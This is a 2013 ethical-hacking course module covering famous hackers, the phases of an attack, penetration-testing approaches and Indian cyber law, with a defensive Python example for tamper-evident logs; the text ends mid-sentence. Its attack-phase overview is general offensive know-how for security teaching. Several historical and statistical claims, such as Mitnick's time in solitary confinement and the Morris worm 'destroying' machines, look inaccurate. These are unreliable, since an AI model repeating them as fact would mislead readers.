Intelligent Quotient System Pvt. Ltd.
Ethical Hacking
Module-II
Ethical Hacking Part I
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 2
Ethical Hacking Part I
Preface
The purpose of this book is to give an overview of the cyber world and its security. In this book the reader will come to know about firewalls, IPS, anti-virus and other security technologies. With the shift towards computerization and the Internet, people know Facebook, Orkut, Gmail, Yahoo and many more sites but are not aware of the possible threats if proper precautions are not taken. They don't know the risk unless and until a threat knocks at their door.
The role of ethical hackers (or Information Security Experts) is to protect data and track unauthorized or malicious hackers, especially in sectors like IT, police services, defence, insurance and banking.
This book covers topics such as cyber law, email security, hacking methodology, mobile security, and the understanding and prevention of various computer attacks. In short, it is a blend of technology and law, teaching you how you can use technology safely and achieve your objective.
Why Ethical Hacking?
Today, as computers and the Internet are used in every home and by every person, everyone also requires knowledge of how to secure their computer and network. Unethical hackers, better known as black hats, are interested in the information systems of government, corporate, public and private networks so that they can steal crucial data and profit from it. Most organizations now rely on cyber networks, and their operations depend on information systems that must be maintained, protected and secured from exploitation and attack.
Who Is This Book For?
This book is intended to serve the needs of students and to provide guidance on using computer networks in an efficient and secure way. In addition, concepts are reinforced by real-world examples of digital attacks and their consequences. These real-world examples, along with hands-on practicals and case studies, make this book a practical learning tool.
INDEX
Contents
Chapter 1
Hacking
1.1. Introduction
1.2. Introduction to Hackers
1.3. Hacking Ethical or Unethical
1.4. Ethical hacking Approaches
1.5. Classes of Hackers
Chapter 2
Cyber Laws
2.1. Introduction to Cyber Law
2.2. Background for Cyberlaws
2.3. Cyberlaw concern
2.4. Cyber Crime and IT Act, 2000
2.5. Importance of Cyberlaw
2.6. Offences under the IT Act
2.7. Measures to Prevent Cyber Crime
Chapter 3
OS Footprinting
3.1. Introduction of Footprinting
3.2. Information Gathering
3.3. OS Footprinting tools
Chapter 4
Google Hacking
4.1. Introduction of Google
4.2. Uses of Google Hacking Database
4.3. Google hacking Techniques
4.4. Preventing attacks
Chapter 5
Scanning
5.1. Introduction of Scanning
5.2. Types of Scanning
5.3. Scanning Methodology
5.4. Anonymizers
5.5. HTTP Tunneling
5.6. IP Spoofing
Chapter 6
Enumeration
6.1. Introduction
6.2. Enumeration Steps
6.3. Tools for Enumeration
6.4. Null Sessions
6.5. SNMP Enumeration
6.6. Zone Transfer
6.7. Countermeasures
Chapter 7
Sniffers
7.1. Introduction
7.2. Types of Sniffing
7.3. Sniffing Protocols
7.4. Sniffing Tools
7.5. Countermeasures
Chapter 8
Password Cracking
8.1. Introduction
8.2. Attack methods
8.3. Password Cracking Tools
8.4. Web-Based Password Cracking
Chapter 9
Email account hacking and tracing
9.1. Introduction
9.2. Email headers
9.3. Trace the e-mail sender
Chapter 10
Telnet and FTP
10.1. Introduction to Telnet
10.2. Use of FTP
10.3. Anonymous FTP login
10.4. Website Defacement
Chapter 11
DoS Attack
11.1. Introduction to DoS
11.2. Types of DoS Attacks
11.3. DDoS Attacks Working
11.4. BOTs/BOTNETs Working
11.5. Forms of denial of service
11.6. Tools for DoS Attack
11.7. Countermeasures
Chapter 12
Hacking Wireless Network
12.1. Introduction
12.2. Overview of WEP, WPA
12.3. Wireless Hacking Techniques
12.4. Secure Wireless Networks Method
12.5. Hacking tools
CHAPTER 1
HACKING
Objective
1.1 Introduction of Hacking
1.2 Introduction of Hackers
1.3 Hacking Ethical or Unethical
1.4 Approaches of Ethical Hacking
1.5 Hackers Classes
1.1. Hacking
Hacking is the act of penetrating computer systems to gain knowledge about the system and how it works. It is also the act of gaining access, without legal authorization, to a computer, a computer network or network resources.
[1] http://password-hacking-tips.blogspot.in/
1.2. Hackers [2]
In simple words, a hacker is a person who breaks into computers without the owner's permission and who accesses a computer system by circumventing its security. Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer.
Malicious hackers
These can be termed crackers: people who try to gain unauthorized access to computers. This is normally done through the use of a 'backdoor' program installed on your machine. Many crackers also try to gain access to resources through the use of password-cracking software, which tries billions of passwords to find the correct one for accessing a computer.
Famous Computer Hackers
1. Kevin Mitnick [3]
Mitnick is perhaps synonymous with the word hacker. The Department of Justice still refers to him as "the most wanted computer criminal in United States history." His accomplishments were memorialized in two Hollywood movies: Takedown and Freedom Downtime. Mitnick got his start by exploiting the Los Angeles bus punch card system and getting free rides. Then, similar to Steve Wozniak of Apple, Mitnick tried phone phreaking. Mitnick was first convicted for hacking into the Digital Equipment Corporation's computer network and stealing software. Kevin Mitnick gained notoriety in the 1980s as a hacker who allegedly broke into the North American Aerospace Defense Command (NORAD) when he was 17 years old.
[2] realitypod.com
[3] twitter.com
Mitnick's reputation seemed to grow with every retelling of his exploits,
eventually leading to the rumor that Mitnick had made the FBI's Most
Wanted list. In reality, Mitnick was arrested several times for hacking
into secure systems, usually to gain access to powerful computer
software.
Mitnick then embarked on a two-and-a-half-year, coast-to-coast hacking spree. He has stated that he hacked into computers, scrambled phone networks, stole corporate secrets and hacked into the national defense warning system. His fall came when he hacked into the home computer of fellow computer expert and hacker Tsutomu Shimomura.
Mitnick is now a productive member of society. After serving 5 years and
8 months in solitary confinement, he is now a computer security author,
consultant and speaker.
2. Adrian Lamo [4]
Lamo hit major organizations hard, hacking into Microsoft and The New York Times. Lamo would use Internet connections at coffee shops, Kinko's and libraries to achieve his feats, earning him the nickname "The Homeless Hacker". Lamo frequently found security flaws and exploited them. He would often inform the companies of the flaw. Lamo's hit list includes Yahoo!, Citigroup, Bank of America and Cingular. Of course, white hat hackers do this legally because they are hired by the company to do so; Lamo, however, was breaking the law.
Lamo's intrusion into The New York Times intranet placed him squarely among the top cyber-crime offenders. For this crime, Lamo was ordered to pay $65,000 in restitution. Additionally, he was sentenced to six months of home confinement and two years' probation. His probation expired in January 2007. Lamo is now a notable public speaker and award-winning journalist.
[4] celebslists.com
3. Jonathan James
On the other end of the spectrum are the black hats of the hacking world. At the age of 16, Jonathan James became the first juvenile hacker to be sent to prison. He later admitted that he was just having fun and looking around, and enjoyed the challenge. James hit high-profile organizations including a server of the Defense Threat Reduction Agency, which is an agency of the Department of Defense. With this hack he was able to capture usernames and passwords and view highly confidential emails.
Also high on James's list, he hacked into NASA computers and stole software valued at over $1.7 million. The Justice Department was quoted as saying: "The software stolen by James supported the International Space Station's physical environment, including control of the temperature and humidity within the living space." Upon discovering this hack, NASA had to shut down its entire computer system, costing taxpayers $41,000. Today James aspires to start a computer security company.
4. Robert Tappan Morris
Morris is the son of a former National Security Agency scientist named Robert Morris. Robert is the creator of the Morris worm. This worm was credited as the first computer worm spread through the Internet. Because of his actions, he was the first person to be prosecuted under the 1986 Computer Fraud and Abuse Act.
Morris created the worm while a student at Cornell, claiming that he intended to use the worm to see how large the Internet was at the time. The worm, however, reproduced itself uncontrollably, shutting down many computers until they had completely malfunctioned. Experts claim 6,000 machines were destroyed. Morris was ultimately sentenced to three years' probation, 400 hours of community service and assessed a $10,500 fine.
Morris is now a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. His focus is computer network architecture.
[5] urbantitan.com
[6] worldtop10.net
5. Kevin Poulsen [7]
Kevin Poulsen, or Dark Dante, specialized in hacking phone systems. He is famous for hacking the phones of a radio station called KIIS-FM. Poulsen's hack allowed only calls originating from his house to make it through to the station, allowing him to win various radio contests. The FBI began to search for Poulsen when he hacked into the FBI database and federal computers for sensitive wiretap information. Poulsen's specialty was hacking into phone lines, and he frequently took over all of a station's phone lines. Poulsen also reactivated old Yellow Pages escort telephone numbers for a partner who operated a virtual escort agency. Poulsen was featured on Unsolved Mysteries and then captured in a supermarket. He was assessed a sentence of five years.
Since his time in prison, Poulsen has worked as a journalist and was promoted to senior editor for Wired News. His most popular article details his work on identifying 744 sex offenders with MySpace profiles.
It's likely that there are thousands of hackers active online today, but
an accurate count is impossible. Many hackers don't really know what
they are doing -- they're just using dangerous tools. Others know what
they're doing so well that they can slip in and out of systems without
anyone ever knowing.
[7] yugworld.in
1.2.1. Damage a malicious hacker can do
This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that can be done to a file. A hacker could install several programs on your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information.
1.3. Can hacking be ethical?
Many people ask, "Can hacking be ethical?" Yes! Ethical hackers are usually security professionals or network penetration testers who use their hacking skills and toolsets for defensive and protective purposes. Ethical hackers who are security professionals test their network and systems security for vulnerabilities using the same tools that a hacker might use to compromise the network. Any computer professional can learn the skills of ethical hacking.
As we mentioned earlier, the term cracker describes a hacker who uses their hacking skills and toolset for destructive or offensive purposes such as disseminating viruses or performing DoS attacks to compromise or bring down systems and networks. No longer just looking for fun, these hackers are sometimes paid to damage corporate reputations or steal or reveal credit-card information, while slowing business processes and compromising the integrity of the organization. [8]
[8] http://www.zybeak.com
1.3.1. What Ethical Hackers Do
Ethical hackers are motivated by different reasons, but their purpose is
usually the same as that of crackers: They’re trying to determine what an
intruder can see on a targeted network or system, and what the hacker
can do with that information. This process of testing the security of a
system or network is known as a penetration test. Hackers break into
computer systems. Contrary to widespread myth, doing this doesn’t
usually involve a mysterious leap of hackerly brilliance, but rather
persistence and the dogged repetition of a handful of fairly well-known
tricks that exploit common weaknesses in the security of target systems.
Accordingly, most crackers are only mediocre hackers.
Many ethical hackers detect malicious hacker activity as part of the
security team of an organization tasked with defending against malicious
hacking activity. When hired, an ethical hacker asks the organization
what is to be protected, from whom, and what resources the company is
willing to expend in order to gain protection.
1.3.2. Skills Required to Become an Ethical Hacker
Ethical hackers who stay a step ahead of malicious hackers must be computer systems experts who are very knowledgeable about computer programming, networking and operating systems. In-depth knowledge about highly targeted platforms (such as Windows, UNIX and Linux) is also a requirement. Patience, persistence and immense perseverance are important qualities that many hackers possess, because of the length of time and level of concentration required for most attacks/compromises to pay off. Most ethical hackers are knowledgeable about security areas and related issues but don't necessarily have a strong command of the countermeasures that can prevent attacks. The following chapters of this book will address both the vulnerabilities and the countermeasures to prevent certain types of attacks.
1.3.3.Conducting Ethical Hacking
Ethical hacking is usually conducted in a structured and organized manner, typically as part of a penetration test or security audit. The depth and breadth of the systems and applications to be tested are usually determined by the needs and concerns of the client.
The following steps are a framework for performing a security audit of an
organization:
1. Talk to the client, and discuss the needs to be addressed during
the testing.
2. Prepare and sign nondisclosure agreement (NDA) documents with
the client.
3. Organize an ethical hacking team, and prepare a schedule for
testing.
4. Conduct the test.
5. Analyze the results of the testing, and prepare a report.
6. Present the report to the client.
1.3.4.Ethical Hacking Steps
An ethical hacker follows processes similar to those of a malicious
hacker. The steps to gain and maintain entry into a computer system are
similar no matter what the hacker’s intentions are. Figure 1.1 illustrates
the five phases that hackers generally follow in hacking a system. The
following sections cover these five phases.
Figure 1.1: Phases of hacking [9]
Phase 1: Passive and Active Reconnaissance
Passive reconnaissance involves gathering information regarding a
potential target without the targeted individual’s or company’s
knowledge. Passive reconnaissance can be as simple as watching a
building to identify what time employees enter the building and when
they leave. However, it’s usually done using Internet searches or by
Googling an individual or company to gain information. This process is
generally called information gathering. Social engineering and dumpster
diving are also considered passive information-gathering methods.
Sniffing the network is another means of passive reconnaissance and can yield useful information such as IP address ranges, naming conventions, hidden servers or networks, and other available services on the system or network. Sniffing network traffic is similar to building monitoring: a hacker watches the flow of data to see what time certain transactions take place and where the traffic is going.
[9] ahmedccna.blogspot.com
Active reconnaissance involves probing the network to discover individual
hosts, IP addresses, and services on the network. This usually involves
more risk of detection than passive reconnaissance and is sometimes
called rattling the doorknobs. Active reconnaissance can give a hacker an
indication of security measures in place (is the front door locked?), but
the process also increases the chance of being caught or at least raising
suspicion. Both passive and active reconnaissance can lead to the discovery of useful information to use in an attack. For example, it's usually easy to find the type of web server and the operating system (OS) version number that a company is using. This information may enable a hacker to find a vulnerability in that OS version and exploit it to gain more access.
Phase 2: Scanning
Scanning involves taking the information discovered during
reconnaissance and using it to examine the network. Tools that a hacker
may employ during the scanning phase can include dialers, port
scanners, network mappers, sweepers, and vulnerability scanners.
Hackers are seeking any information that can help them perpetrate an attack, such as computer names, IP addresses and user accounts.
Phase 3: Gaining Access
This is the phase where the real hacking takes place. Vulnerabilities
discovered during the reconnaissance and scanning phase are now
exploited to gain access. The method of connection the hacker uses for
an exploit can be a local area network (LAN, either wired or wireless),
local access to a PC, the Internet, or offline. Examples include stack-
based buffer overflows, denial of service (DoS), and session hijacking.
These topics will be discussed in later chapters. Gaining access is known
in the hacker world as owning the system.
Phase 4: Maintaining Access
Once a hacker has gained access, they want to keep that access for
future exploitation and attacks. Sometimes, hackers harden the system
from other hackers or security personnel by securing their exclusive
access with backdoors, rootkits, and Trojans. Once the hacker owns the system, they can use it as a base to launch additional attacks. In this case, the owned system is sometimes referred to as a zombie system.
Phase 5: Covering Tracks
Once hackers have been able to gain and maintain access, they cover
their tracks to avoid detection by security personnel, to continue to use
the owned system, to remove evidence of hacking, or to avoid legal
action. Hackers try to remove all traces of the attack, such as log files or
intrusion detection system (IDS) alarms. Examples of activities during
this phase of the attack include steganography, the use of tunneling
protocols, and altering log files. Steganography and use of tunneling for
purposes of hacking will be discussed in later chapters.
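As an added defender-side illustration of this phase (example code written for this edition, not taken from the original book or from any tool it names): altering log files works because a plain log carries no integrity protection. The Python below keeps a hash-chained log, tagging each record over the previous tag, so an edited or deleted interior record breaks the chain at that position. The sample log lines, the key and the function names are all constructed for the demonstration.

```python
import hashlib
import hmac

# Constructed sample log lines for the demonstration (not from the original page).
SAMPLE_LOG = [
    "2013-05-01T10:00:01 sshd: Accepted password for alice from 10.0.0.5",
    "2013-05-01T10:02:17 sshd: Failed password for root from 203.0.113.9",
    "2013-05-01T10:02:19 sshd: Failed password for root from 203.0.113.9",
    "2013-05-01T10:05:44 sudo: alice : COMMAND=/bin/cat /etc/shadow",
]

# Hypothetical key; in practice it is held by the log collector, not the logging host.
KEY = b"constructed-demo-key-not-for-production"

GENESIS = b"\x00" * 32  # fixed starting value for the chain


def _tag(key, prev, line):
    """HMAC over the previous tag and the current line: links the record to its predecessor."""
    return hmac.new(key, prev + line.encode("utf-8"), hashlib.sha256).digest()


def chain_log(lines, key=KEY):
    """Return a list of (line, tag_hex); each tag covers the line and the previous tag."""
    prev = GENESIS
    records = []
    for line in lines:
        tag = _tag(key, prev, line)
        records.append((line, tag.hex()))
        prev = tag
    return records


def verify_chain(records, key=KEY):
    """Return the index of the first record that fails verification, or -1 if every
    record is intact. Editing or deleting an interior record breaks the chain at that
    position, because the following tag was computed over the original previous tag."""
    prev = GENESIS
    for i, (line, tag_hex) in enumerate(records):
        expected = _tag(key, prev, line)
        if not hmac.compare_digest(expected.hex(), tag_hex):
            return i
        prev = expected
    return -1


def verify_with_anchor(records, anchor_hex, key=KEY):
    """Chain verification alone cannot see records removed from the END of the log.
    Comparing the last tag against an anchor stored off-host (the last tag the
    collector saw) catches that truncation as well."""
    if verify_chain(records, key) != -1:
        return False
    last = records[-1][1] if records else GENESIS.hex()
    return hmac.compare_digest(last, anchor_hex)


if __name__ == "__main__":
    recs = chain_log(SAMPLE_LOG)
    anchor = recs[-1][1]  # what a separate collector would have recorded
    print("intact chain:", verify_chain(recs))  # -1

    # Attacker rewrites a failed login as a successful one: detected at index 1.
    edited = list(recs)
    edited[1] = (edited[1][0].replace("Failed", "Accepted"), edited[1][1])
    print("edited record breaks at:", verify_chain(edited))  # 1

    # Attacker deletes an interior record: the next record no longer links back.
    deleted = recs[:1] + recs[2:]
    print("deleted record breaks at:", verify_chain(deleted))  # 1

    # Attacker drops the last record: only the off-host anchor reveals it.
    truncated = recs[:-1]
    print("truncation seen by chain alone:", verify_chain(truncated))  # -1
    print("truncation seen with anchor:", verify_with_anchor(truncated, anchor))  # False
```

The chain alone cannot see records removed from the end of the log, which is why verify_with_anchor compares the final tag with a value held by a separate collector; both the key and that anchor must live off the monitored host, since an attacker who owns the system could otherwise simply re-chain the log after editing it.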
1.4. Ethical hacking Approaches
Ethical hacking is the most extreme form of technical security testing. Unlike in a penetration test, the testers keep looking for vulnerabilities until they find one suitable for reaching the predefined target. The aim of ethical hacking is to discover design-based security holes and to exploit trust relationships.
In addition, an important component of the security model, the response of the internal security teams and equipment, is fully assessed. The objectives of an ethical hacking test are to cover the remaining points that a typical penetration test lacks.
An ethical hacking test can be separated into multiple approaches, each aiming for different objectives. Because the goal is to focus on the design and not on the software itself, the range of elements to audit should be fairly wide.
1.4.1.Black Box Approach
The Black Box model follows a stochastic approach to the attack. This signifies that there are many more unknowns or variables to be learned when utilizing this modus operandi of attack than when one uses other approaches. However, this does not mean that this method is without bounds. The static portion of this attack centers on the operational constraints that are placed upon the hacking team. The Black Box hacker is seen as a distrusted outsider with little or no knowledge concerning either the network or any security policies in effect. Therefore, this model assumes that the network attackers proceed from the unknown to the known, much as a criminal hacker would in real life during the initial phases of the attack. However, one must also differentiate between the various kinds of criminal hackers in order to determine which categories of attackers will be used during the Black Box test. There are four basic competencies or types of criminal hackers: script kiddies or novices, technically astute hackers, sophisticated hackers, and disgruntled insider attackers.
1.4.2.White Box Approach
The White Box approach is another attack method that may be used by the ethical hacker. This is a more deterministic plan of attack than the Black Box one. What is meant by this is that the White Box ethical hacking team will have much more information divulged to them prior to the penetration test, so there will be fewer unknowns or variables. Since the variables are limited, the methods utilized in the attack will probably be more controlled, hence more deterministic. The rationale behind using the White Box mode versus the Black Box mode is twofold: time and money. The ethical hacking team only has a limited amount of time in which to access the network, and the longer it takes them, the more resources they will have to utilize and ultimately the more it will cost the customer. By giving the ethical hacker the information about the network and its security posture in advance, the White Box method can significantly reduce the amount of investment required to accomplish this task.
However, there are those who feel that the Black Box approach is a more accurate way to assess the strength of a network's defense because it illustrates how a criminal hacker might attempt to attack the network. The criminal hacker may have extensive knowledge of the target organization, since the hacker might have been a previous employee or because hackers have a great amount of time to gather intelligence. Since the criminal hacker has had so much time to gather information about the network, it would be wise to allow the penetration testers to have access to the internal network's configuration. While there are pros and cons to any method of penetration testing, it must be reiterated that there is a time and place for each one. The White Box model takes the approach that the penetration team functions as "trusted insiders" who have access to the complete details of the internal network. This is not to say that there will be no need for reconnaissance against the company; rather, there may be a real need to do so. There is the distinct possibility that the customer is very unaware of the boundaries of their network. If the organization is large, then there is the likelihood that they are connected to other partners or to different divisions within the same organization that have different levels of security protections and policies in place. If this is in fact the case, then it would be a grave disservice to the client for the ethical hacking team to fail to explore this. In addition, it must be stated that the White Box team will use the same tools and similar methods as the Black Box team. The difference between the two approaches is more in terms of the degree of usage and the amount of time needed to utilize them in the attack.
There are three main groups of personnel in the organization for the
penetration team to bring into play in order to obtain the information
they need for the White Box attack: upper management, technical
support management and human resources working in conjunction with
the legal department. Each group will provide a different expertise and
viewpoint for the penetration team. Collectively employed, these three
groups will provide the framework for the attack process.
1.4.3.Gray Box Approach
The Gray Box approach is essentially a hybrid attack model. It
incorporates elements of both the Black Box and the White Box methods.
There are two players in this scenario: the untrusted outsider who is
working with the trusted insider to compromise the network. Basically,
this attack model allows for many interesting possibilities. The outsider
may be in the process of initiating Black Box reconnaissance attacks
while the insider is feeding important information to him or her. Now the
external hacker will be able to tailor the scope of these attacks to the
areas of true vulnerability. As with any attack model, the ultimate focus
and direction comes from the client’s management team. They will
determine the criteria for specifying the rules of engagement and will
dictate what levels of knowledge will be revealed to the hacking team.
Therefore, the ethical hacking members may have to play different roles
for this approach, some acting as insiders while others are acting as
outsiders. This will posit some interesting problems for the team. First,
the management will have to determine what sort of communications
channels will be allowed between the insiders and the outsiders. If the
rules of engagement presuppose that the external attackers are
thousands of miles away, then it would not be appropriate for the Black
Box team to get with the White Box team at the end of the day to
compare notes. Second, the ethical attack team must have a contingency plan in place should it just so happen that the communication link between the insider and the outsider becomes broken (remember, there may be various scenarios acted out during the attack). The team must be ready to revert to a pure Black Box approach if this transpires. Since it may not be possible to regain insider access, they must use any insider information previously obtained in a judicious fashion. One possible drawback to using the Gray Box approach is one that may also be seen in the White Box approach. When resources are revealed to the attack team, there is the tendency to overlook vulnerabilities that aren't readily apparent. The attack team has the information that it is looking for, but they aren't forced to scrutinize the network, so things are overlooked. The way to avoid this issue is to ensure that the test team has a definitive methodology for their attack models. By following checklists and using established procedures, this is less likely to happen.
1.5. Classes of Hackers
1.5.1. White hat [10]
A white hat hacker breaks security for non-malicious reasons, for instance testing their own security system. This type of hacker enjoys learning and working with computer systems, and consequently gains a deeper understanding of the subject. Such people normally go on to use their hacking skills in legitimate ways, such as becoming security consultants.
1.5.2. Grey hat [11]
A grey hat hacker is a hacker of ambiguous ethics and/or borderline legality. A grey hat, in the hacking community, refers to a skilled hacker who sometimes acts illegally, sometimes in good will, and sometimes not. They are a hybrid between white and black hat hackers. They usually do not hack for personal gain or have malicious intentions, but may or may not occasionally commit crimes during the course of their technological exploits.
In April 2000, grey hat hackers gained unauthorized access to apache.org. These people could have tried to damage the apache.org servers, write text offensive to the Apache crew, distribute Trojans or take other malicious actions. Instead, they chose just to alert the Apache crew to the problems and then publish a security alert.
[10] harix-in.blogspot.com
[11] wildwingshackers.blogspot.com
1.5.3. Black hat
A black hat hacker, sometimes called a "cracker", is someone who breaks computer security without authorization or uses technology (usually a computer, phone system or network) for vandalism, credit card fraud, identity theft, piracy, or other types of illegal activity. They may use computers to attack systems for profit, for fun, for political motivations or as part of a social cause.
1.5.4.Script kiddies
A script kiddie is a non-expert who breaks into computer systems by
using pre-packaged automated tools written by others, usually with little
understanding. These are the outcasts of the hacker community. It is
generally assumed that script kiddies are juveniles who lack the ability to
write sophisticated hacking programs or exploits on their own, and that
their objective is to try to impress their friends or gain credit in
computer-enthusiast communities.
Script kiddies have at their disposal a large number of effective, easily
downloadable malicious programs capable of harassing even advanced
computers and networks. Such programs have included WinNuke
applications, Back Orifice, NetBus, Sub7, Metasploit, ProRat,
PassJacker, iStealer, Snoopy, Locust Bot and/or software intended for
legitimate security auditing. Another simple means of attack is a mass
mailer worm. These are spread through e-mails and, once opened, they
can be automatically sent throughout entire systems, often without the
users realizing it.
1.5.5. Hacktivist
A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message, and hacktivism is hacking for some cause. In general, most hacktivism involves website defacement or denial-of-service attacks. In more extreme cases, hacktivism is used as a tool for cyber terrorism. Hacktivists are also known as Neo Hackers. [12]
[12] http://professionalhackers.webs.com/whatishacking.htm
CHAPTER 2
CYBER LAWS
Objective
2.1 Introduction of Cyber Law
2.2 Background for Cyber Law
2.3 Concern of Cyber Law
2.4 Cyber Crime and IT Act, 2000
2.5 Importance of Cyber Law
2.6 Offences under the IT Act
2.7 Measures to Prevent Cyber Crime
2.1. Cyber Law [13]
Cyber law is a new phenomenon, having emerged long after the onset of the Internet. The Internet grew in a completely unplanned and unregulated manner. Even the inventors of the Internet could not have really anticipated the scope and far-reaching consequences of cyberspace. The growth rate of cyberspace has been enormous.
With the spontaneous and almost phenomenal growth of cyberspace, new issues relating to various legal aspects of cyberspace began cropping up. In response to these newly emerging legal issues, CYBERLAW, or the law of the Internet, came into being. The growth of cyberspace has resulted in the development of a new and highly specialized branch of law called CYBERLAWS: LAWS OF THE INTERNET AND THE WORLD WIDE WEB.
13
cyberlaws.net
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 22
Ethical Hacking Part I
2.2. Background for Cyber Laws
Since the beginning of civilization, man has always been motivated by
the need to make progress and improve existing technologies. This has
led to tremendous development and progress, which has in turn been a
launching pad for further development. Of all the significant advances
made by mankind from the beginning till date, probably the most important
of them is the development of the Internet. To put it in a common man's
language, the Internet is a global network of computers, all of them speaking
the same language. In 1969, America's Department of Defense
commissioned the construction of a super network called ARPANET. The
Advanced Research Projects Agency Network (ARPANET) was basically
intended as a military network of 40 computers connected by a web of
links and lines. This network slowly grew and the Internet was born. By
1981, over 200 computers were connected from all around the world.
Now the figure runs into millions.
The real power of today's Internet is that it is available to anyone with
a computer and a telephone line. The Internet places at an individual's hands
the immense and invaluable power of information and communication.
Internet usage has significantly increased over the past few years. The
number of data packets flowing through the Internet has increased
dramatically. According to International Data Corporation ("IDC"),
there were more than 450 million mobile Internet users worldwide in 2009,
a number that is expected to more than double by the end of 2013.
Worldwide, more than 624 million Internet users will make online purchases
in 2009, totaling nearly $8 trillion. By 2013, worldwide e-commerce
transactions will be worth more than $16 trillion. China continues to have
more Internet users than any other country, with 359 million in 2009. This
number is expected to grow to 566 million by 2013. The United States had
261 million Internet users in 2009, a figure that will reach 280 million in
2013. India will have one of the fastest growing Internet populations,
growing almost two-fold between 2009 and 2013. For more information
about statistics you can visit www.internetworldstats.com/stats.htm.
If left to its own measure, it is highly unlikely that such a trend can
reverse itself. Given this present state of the Internet, the necessity of
Cyber laws becomes all the more important.
2.3. Does Cyber law concern you?
Yes, Cyber law does concern you. [14] As the nature of the Internet is
changing and this new medium is being seen as the ultimate medium ever
evolved in human history, every activity of yours in Cyberspace can and
will have a Cyber legal perspective. From the time you register your Domain
Name, to the time you set up your web site, to the time you promote your
website, to the time when you send and receive emails, to the time you
conduct electronic commerce transactions on the said site, at every point
of time there are various Cyber law issues involved. You may not be
bothered about these issues today because you may feel that they are very
distant from you and that they do not have an impact on your Cyber
activities. But sooner or later, you will have to tighten your belt and take
note of Cyber law for your own benefit.
For example, you may knowingly or unknowingly book a Domain Name,
say www.xyx.com, which may be the trade mark of some other company,
person or legal entity in any part of the world, say B. Domain Names are
given to you on a first come, first served basis. But you may be drawn by
the other party, B, into a Cyber legal dispute alleging that you are
deliberately involved in the practice of Cyber squatting (the practice of
knowingly registering the trade mark of any legal entity, company or person
with the intention of holding on to it and thereafter selling it to the said
legal entity, company or person at a handsome premium). You may also be
involved in Cyber litigation, as the concerned party, B, may approach the
World Intellectual Property Organization (WIPO) for adjudicating the
matter, and WIPO by a summary procedure may direct you to relinquish
and release the said Domain Name to B. Needless to say, it shall be
incumbent on the concerned party, B, to produce all documentary and
other evidence to substantiate its claim to the concerned Domain Name.
This is just one of the many examples that show the importance of Cyber
law for you.
[14] emcydesign.com
2.4. Cyber Crime and IT Act
CYBER CRIME IS AN EVIL HAVING ITS ORIGIN IN THE GROWING
DEPENDENCE ON COMPUTERS IN MODERN LIFE.
"A simple yet sturdy definition of cybercrime would be unlawful acts
wherein the computer is either a tool or a target or both." Defining
cybercrimes as "acts that are punishable by the Information Technology
Act" would be unsuitable, as the Indian Penal Code also covers many
cybercrimes, such as e-mail spoofing, cyber defamation, etc.
Cybercrime in a narrow sense (computer crime): any illegal behavior
directed by means of electronic operations that targets the security of
computer systems and the data processed by them.
Cybercrime in a broader sense (computer-related crime): any illegal
behavior committed by means of, or in relation to, a computer system or
network, including such crimes as illegal possession and offering or
distributing information by means of a computer system or network. [15]
Therefore, cybercrimes can involve criminal activities that are traditional
in nature, such as theft, fraud, forgery, defamation and mischief, all of
which are subject to the Indian Penal Code. The abuse of computers has
also given birth to a gamut of new age crimes that are addressed by the
Information Technology Act, 2000.
Cyber Law in India [16]
When the Internet was developed, the founding fathers of the Internet
hardly had any inclination that it could transform itself into an
all-pervading revolution which could be misused for criminal activities and
which required regulation. Today, there are many disturbing things
happening in cyberspace. Due to the anonymous nature of the Internet, it
is possible to engage in a variety of criminal activities with impunity, and
people with intelligence have been grossly misusing this aspect of the
Internet to perpetrate criminal activities in cyberspace. Hence the need
for Cyber laws in India.
[15] http://www.cyberlawclinic.org/cybercrime.htm
[16] perfectlawyers.org
India passed the Information Technology Act, 2000 to deal with the
emerging cyber issues. It aims to provide the legal framework so that
legal sanctity is accorded to all electronic records and transactions
carried out by means of electronic data interchange and other means of
electronic communication (e-commerce). However, it does not deal with
major issues like spamming, cyber stalking, phishing, etc. It has since
been amended by the IT (Amendment) Act, 2008, discussed later in this
chapter in the offences section.
In May 2000, both houses of the Indian Parliament passed the
Information Technology Bill. The Bill received the assent of the President
in August 2000 and came to be known as the Information Technology
Act, 2000. Cyber laws are contained in the IT Act, 2000. This Act aims to
provide the legal infrastructure for e-commerce in India, and the cyber
laws have a major impact on e-businesses and the new economy in
India. So, it is important to understand the various perspectives of the
IT Act, 2000 and what it offers.
2.5. Importance and Need of Cyber Law: IT Act
Cyber law is important because it touches almost all aspects of
transactions and activities on and concerning the Internet, the World
Wide Web and Cyberspace. Initially it may seem that Cyber law is a very
technical field and that it does not have any bearing on most activities in
Cyberspace. But the actual truth is that nothing could be further from the
truth. Whether we realize it or not, every action and every reaction in
Cyberspace has some legal and Cyber legal perspectives. [17]
The IT Act, 2000 is India's cyber law. Cyber law is seen as an essential
component of the criminal justice system all over the world, and the same
applies to the cyber law of India. In the Indian context, the Information
Technology Act, 2000 (IT Act, 2000) is the cyber law of India. It is the
exclusive law in this regard and is under the process of amendment. India
has done a good job by enacting a cyber-law. It is the 12th country of the
world having a cyber-law. It covers areas like e-governance, e-commerce,
cyber contraventions and cyber offences. However, some critics and cyber
law experts have questioned the strength of the IT Act, 2000. It would be
prudent to analyze the exact position that applies to the Indian cyber law.
[17] http://www.cyberlaws.net/cyberindia/cybfaq.htm
Success in any field of human activity leads to crime that needs
mechanisms to control it. Legal provisions should provide assurance to
users, empowerment to law enforcement agencies and deterrence to
criminals. The law is as stringent as its enforcement. Crime is no longer
limited to space, time or a group of people. Cyber space creates moral,
civil and criminal wrongs. It has now given a new way to express criminal
tendencies. Back in 1990, less than 100,000 people were able to log on
to the Internet worldwide. Now around 500 million people are hooked up
to surf the net around the globe.
Until recently, many information technology (IT) professionals lacked
awareness of, or interest in, the cyber crime phenomenon. In many cases,
law enforcement officers have lacked the tools needed to tackle the
problem; old laws didn't quite fit the crimes being committed, new laws
hadn't quite caught up to the reality of what was happening, and there
were few court precedents to look to for guidance. [18] Furthermore,
